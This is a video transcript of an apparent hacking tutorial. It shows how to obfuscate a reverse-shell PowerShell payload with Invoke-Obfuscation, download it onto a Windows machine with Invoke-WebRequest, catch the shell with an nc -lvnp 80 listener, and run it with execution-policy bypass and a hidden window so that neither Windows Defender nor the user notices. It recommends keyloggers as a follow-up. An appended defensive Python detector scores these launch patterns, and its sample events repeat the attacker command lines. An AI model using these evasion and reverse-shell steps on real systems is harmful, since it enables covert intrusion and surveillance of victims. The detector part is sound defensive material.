Windows Defender Bypass with Powershell & Invoke-Obfuscation

Captions
All right guys, so to go ahead and get started, we're going to open up Firefox and look for the Invoke-Obfuscation repository by Daniel Bohannon on GitHub. You can Google that. Once you're on there, copy the link for the repository from the Code part, then open up a terminal, or a root terminal, because we run everything as sudo. Find a directory that you want to clone it into. I'm just going to put it in the /opt directory because it's the optional directory, that's what opt stands for. Once you've chosen the directory, we're just going to git clone and paste the link for the GitHub repository for Invoke-Obfuscation. Give it a few seconds and it's cloned; as you can see we have it right here, so now we're good to go.

Invoke-Obfuscation is a PowerShell tool itself, guys, to obfuscate PowerShell payloads, so we're going to need to use PowerShell to use this tool. Luckily for us Kali Linux can use PowerShell, so we're going to open that up. Once you've got PowerShell opened up, go to the directory you cloned the Invoke-Obfuscation tool into; for me that is /opt, and as you can see it's right here, Invoke-Obfuscation. We're going to head inside that directory, and once we're inside we can start with the installation and starting the program. It's very simple: go to the GitHub page, to the installation part, and it's going to tell you what you need to do. There's only two things: as you can see we're going to import this module right here, and then we're just going to start the program using the Invoke-Obfuscation command. So let's copy that first one and paste it inside the repository. You see we're inside the Invoke-Obfuscation directory, and it's very important, you got to be inside the directory. We've got no errors, so we should be good to go. Once you've imported the module, all you got to do is type in Invoke-Obfuscation and that's going to start up the program, so now we can actually start obfuscating our PowerShell payloads.

Before we obfuscate anything we obviously need a PowerShell payload to obfuscate. To look for one, I like to use PayloadsAllTheThings from swisskyrepo. Once you're on this GitHub, go to the PowerShell part, click on PowerShell, and I like to use this one right here, the second one. Now we're not going to copy this part right here before the quotation marks, because we don't need that; we're just going to get the straight raw payload. So we're going to copy past this double quote mark, and we're going to skip the last double quote as well, so just copy everything in between the double quotes and don't copy that last double quote. That's the actual raw PowerShell payload.

Let's open up a terminal so that we can create this file on our Kali machine and then set the path to the file so that it gets obfuscated. We're just going to go to our /home/kali directory and put the file there. So let's create a file called ninja.ps1 and paste in the payload that we got from PayloadsAllTheThings, and we're going to change two things: the IP address and the port. Let's find out what our IP address is with ifconfig; our IP address is 10099, so let's change that one to 99. The port we're going to use is port 80 because that's a commonly used port, so it shouldn't give us any issues when facing a firewall or any of that kind of stuff. Just a tip: you may want to use commonly used ports for reverse shells so that the traffic doesn't get flagged by a firewall etc., it's common practice. We're going to save that, and that's going to be our payload that we're going to obfuscate. It's in the /home/kali directory; wherever you put your payload, keep that in mind, because you're going to need to set the full path when you're obfuscating it using Invoke-Obfuscation.

Let's go back to our PowerShell, and now we're going to set the path to the script we just created, which is the PowerShell payload. So we're going to say SET SCRIPTPATH and put the path, /home/kali/ninja.ps1, and it says successfully set the script path, so we're good to go. Now all we've got to do is choose our options for how we're going to obfuscate this thing. I use AST for obfuscating my payload because it just works the best. You can read in the GitHub and see how this works, but I'm not going to be going into that too in depth today; I'm just going to show you that you can do this and it does work. So we're going to use AST, which I found to be the best one so far, and we're going to say ALL and type in 1, and that is going to give us our obfuscated payload. This is the actual obfuscated payload that we're going to execute on the target.

Let's create a new file with this as the payload. Go back to our root terminal and create a file called ninja2.ps1; this is going to be our obfuscated payload that we just created. We're going to save that, and let's just cat it to see that it is in fact our obfuscated payload. It's a variable, variata, as you can see; that is the payload we got here, so we're good to go guys.

All that's left to do now is get the file onto the target system and execute it, and I'm also going to be showing you how to execute it as a background process so that it doesn't show on the screen. If you just execute this program without doing any modifications so that you can make it run in the background, or make it a process, or make it a scheduled task, it's just going to show a blank PowerShell window. That's very sus; anybody can tell that's probably not supposed to happen, and they'll probably exit it and your connection will be lost. So I'm going to be showing you how to make this run in the background so the user won't be aware.

Let's go ahead and host our Python web server on port 8080. You're going to host the web server in the directory that you've got your payload in, in my case the /home/kali directory; hit enter and host that web server with the file in it. Then we're going to go to our Windows target PC; in my case it's just going to be my computer. Before we transfer the file, let me show you that Windows Defender is currently on. As you can see here it's all on, and this will be bypassing Windows Defender; that's the purpose of this video. We're going to open up CMD and go to our Desktop directory. You can go to whichever directory you want to; normally, if you were doing this in a real engagement, you'd probably want to go to a directory that's always writable by any user, but for this example we're just going to be using Desktop for simplicity's sake. Now let's use PowerShell to transfer the file over. So let's type in powershell -c Invoke-WebRequest, then the IP address of the web server that's hosting our payload, the port and the file name of the payload, so ninja2.ps1, then -OutFile and the name of the file that you want to output on the Windows computer, so we're just going to name it ninja.ps1. That's going to put it in the current directory that we're in; if you wanted to put it in a different directory you'd have to specify the drive and the full path, but for this example we're just going to put it in the current directory. Hit enter and that's going to download the file, and as you can see here we've got it right here, ninja.ps1 on our Desktop.

Okay, so now what we want to do is execute this payload and catch a reverse PowerShell on netcat. Before we do anything, let's open up a netcat listener on our Kali machine: nc -lvnp 80, because that's the port we have in our payload, and now we're ready to catch a reverse shell from our victim's computer. Let's go back to CMD, and now all we got to do is type in powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File and then the file in double quotes: C: drive, or whatever drive you're on, then the Users\mj53g\Desktop directory, and the file that we want to execute, ninja.ps1, ending with a double quote. All you got to do now is hit enter and that's going to give us a reverse shell. As you can see, we've got a connection immediately, and there's no window, nothing going on, so nobody's any wiser. Let me just show you guys in Task Manager what that looks like: if you ever see these two things running you may want to kill them. You see right here Windows PowerShell, so you've got a Windows PowerShell running in the background, and a Windows Command Processor; that's the background hidden window style that we specified. If we cancel these two things it will cancel our connection, but we're not going to do that. Let's just hit enter, and as you can see guys we have a connection on PowerShell. Let's type in whoami to see who we are, whoami /priv to see the privileges, and we can do something like systeminfo, and basically the sky's the limit now you have access to the target.

The important part of this video is that we didn't even trigger Windows Defender. Windows Defender is just chilling, it just keeps going on, didn't detect anything, so we're good to go. And yeah guys, that's basically how you can use Invoke-Obfuscation in PowerShell to get a reverse shell and bypass Windows Defender. You could use this in conjunction with other attacks; you can download other payloads, put keyloggers, etc., so very useful. I hope you guys learned something. Without further ado, let's get up out of here.
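A defender-side example, added here and not part of the video or of the Invoke-Obfuscation project: a small Python scorer that flags process-creation records (Sysmon Event ID 1 or Security 4688 style) showing the launch pattern the video relies on, a hidden-window PowerShell with the execution policy bypassed running a script from a user-writable path, plus the Invoke-WebRequest download step. The event records, paths and IP address are constructed samples; the field names, the indicator weights and the verdict thresholds are assumptions for this example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (the fields a Sysmon Event ID 1 or
# Security 4688 collector would give you). Hosts, paths and the IP are made up.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\alice\Desktop\ninja.ps1"'},
    {"pid": 4121, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell -c "Invoke-WebRequest http://192.0.2.10:8080/ninja2.ps1 -OutFile ninja.ps1"'},
    {"pid": 4122, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"pid": 4123, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell -ep bypass -w hidden -nop -File %TEMP%\x.ps1"},
]

# Indicator name -> (regex, weight). Parameter names are matched by prefix because
# powershell.exe accepts any unambiguous abbreviation (-w hidden, -ep bypass, -nop).
# The lookbehind keeps cmdlet names such as Invoke-WebRequest from matching as switches.
INDICATORS = {
    "hidden_window":       (r"(?<![\w-])-w[a-z]*\s+hidden\b", 3),
    "exec_policy_bypass":  (r"(?<![\w-])-(?:ep|ex[a-z]*)\s+(?:bypass|unrestricted)\b", 2),
    "script_in_user_path": (r'-f(?:ile)?\s+"?(?:[a-z]:\\users\\|%temp%|%appdata%|%userprofile%)', 2),
    "download_cradle":     (r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", 2),
    "no_profile":          (r"(?<![\w-])-nop[a-z]*\b", 1),
}
PARENT_CMD_WEIGHT = 1  # cmd.exe spawning PowerShell: the pairing the video points out in Task Manager


def score_event(ev: Dict[str, object]) -> Dict[str, object]:
    """Return the matched indicators, a weighted score and a verdict for one event."""
    cmd = str(ev["cmdline"])
    hits: List[str] = [name for name, (rx, _) in INDICATORS.items()
                       if re.search(rx, cmd, re.IGNORECASE)]
    score = sum(INDICATORS[h][1] for h in hits)
    if str(ev["parent"]).lower().endswith("\\cmd.exe"):
        hits.append("parent_cmd")
        score += PARENT_CMD_WEIGHT
    verdict = "suspicious" if score >= 4 else "review" if score >= 2 else "benign"
    return {"pid": ev["pid"], "score": score, "verdict": verdict, "indicators": hits}


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Score every event and return the non-benign ones, highest score first."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["verdict"] != "benign"),
                  key=lambda s: s["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f'pid {hit["pid"]}: {hit["verdict"]} (score {hit["score"]}) {hit["indicators"]}')
```

Command-line matching only sees the launcher, not the obfuscated script body; pair it with PowerShell Script Block Logging (Event ID 4104), which records script text as it is executed, so the layers Invoke-Obfuscation wraps around the payload appear in the log once they run.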
Info
Channel: CybertroniX103
Views: 4,459
Keywords: #how, #howto, #bypass, #windows, #defender, #windowsdefender, #windows10, #using, #powershell, #invoke, #obfuscation, #github, #2023, #working, #cybersecurity, #hacking, #hacker, #hack, #ethicalhacking, #information, #info, #infosec, #kali, #linux, #kalilinux, #pentesting
Id: NdyThrkNUwE
Length: 11min 9sec (669 seconds)
Published: Wed Aug 09 2023